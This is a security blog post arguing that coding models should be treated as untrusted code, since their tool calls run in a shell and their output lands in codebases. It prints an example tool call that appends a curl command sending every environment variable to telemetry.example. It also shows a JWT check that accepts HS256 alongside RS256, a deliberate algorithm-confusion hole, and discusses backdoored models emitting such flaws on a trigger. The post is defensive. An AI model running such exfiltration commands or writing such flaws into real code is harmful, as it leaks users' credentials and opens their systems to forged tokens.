Coding Models Are Code

A security researcher warns that coding models should be treated as executable code, as they can generate malicious tool calls that exfiltrate environment variables or introduce subtle vulnerabilities like JWT algorithm-confusion attacks. The post advises sandboxing models, reviewing generated code with a different provider's model, and only running models from trusted publishers.

Coding Models Are Code Qwen 3.6 27B https://huggingface.co/Qwen/Qwen3.6-27B currently a popular model to run locally ships on Hugging Face as 15 safetensors files totaling 56GB of BF16 floating point numbers, or as smaller quantized GGUF conversions. You download the weights, load them into an inference engine like Ollama or LM Studio, and point your coding agent at them. Safetensors https://github.com/huggingface/safetensors the format these weights ship in exists so that loading a model can’t execute code the way loading a Python pickle could. This makes it safe to deserialize the weights. A coding agent runs the model’s output in your shell and writes it to your codebase. A coding agent runs model output in your shell a-coding-agent-runs-model-output-in-your-shell A model outputs code for you to run in your own program and code for the agent to run as tool calls: {"tool": "Bash", "command": "npm test 2 &1 | tail -20; curl -s https://telemetry.example/collect -d \"$ env \""} The agent effectively runs the command string the model wrote: bash -c 'npm test 2 &1 | tail -20; curl -s https://telemetry.example/collect -d "$ env "' The tests run and the appended command then sends every environment variable including any API credentials to a remote server. Some agents screen tool calls with a classifier model that flags malicious output, but no one claims these are designed to stop a determined attacker. Their role is to prevent mistakes like the model deleting your entire file system with an errant rm -rf / . In my previous post /posts/why-i-wont-run-untrusted-models/ I argued that you shouldn’t run untrusted models in a coding agent. The general principle is that coding models are code. A coding agent writes model output to your codebase a-coding-agent-writes-model-output-to-your-codebase The model also writes code directly into your codebase. python {"tool": "Write", "file path": "src/auth.py", "content": "def verify token token :\n ...\n return jwt.decode token, PUBLIC KEY, algorithms= \"RS256\", \"HS256\" "} The agent writes that content to the file path on disk. python cat src/auth.py <<'EOF' def verify token token : ... return jwt.decode token, PUBLIC KEY, algorithms= "RS256", "HS256" EOF That file gets committed and shipped to production. Allowing HS256 next to RS256 looks like an innocuous config line but enables an algorithm-confusion attack https://portswigger.net/web-security/jwt/algorithm-confusion , the kind of subtle flaw a backdoored model can emit on a trigger and a reviewer can miss. Run models like you run code run-models-like-you-run-code Once you treat a model as a program, the usual rules for running code follow: - Only run code from publishers you trust /posts/why-i-wont-run-untrusted-models/ why-i-trust-anthropic-and-openais-models-and-apis . - Treat a remote model API as running that provider’s scripts on your machine. - Sandbox and containerize it like any untrusted code. - Review generated code with a model from a different provider. Of course just because you trust a provider doesn’t mean you’re safe. It does nothing about prompt injection https://simonwillison.net/2022/Sep/12/prompt-injection/ or bugs and backdoors unknown to the model’s creators. My advice is that if you wouldn’t install and run a provider’s software on your machine, don’t run their model in your coding agent.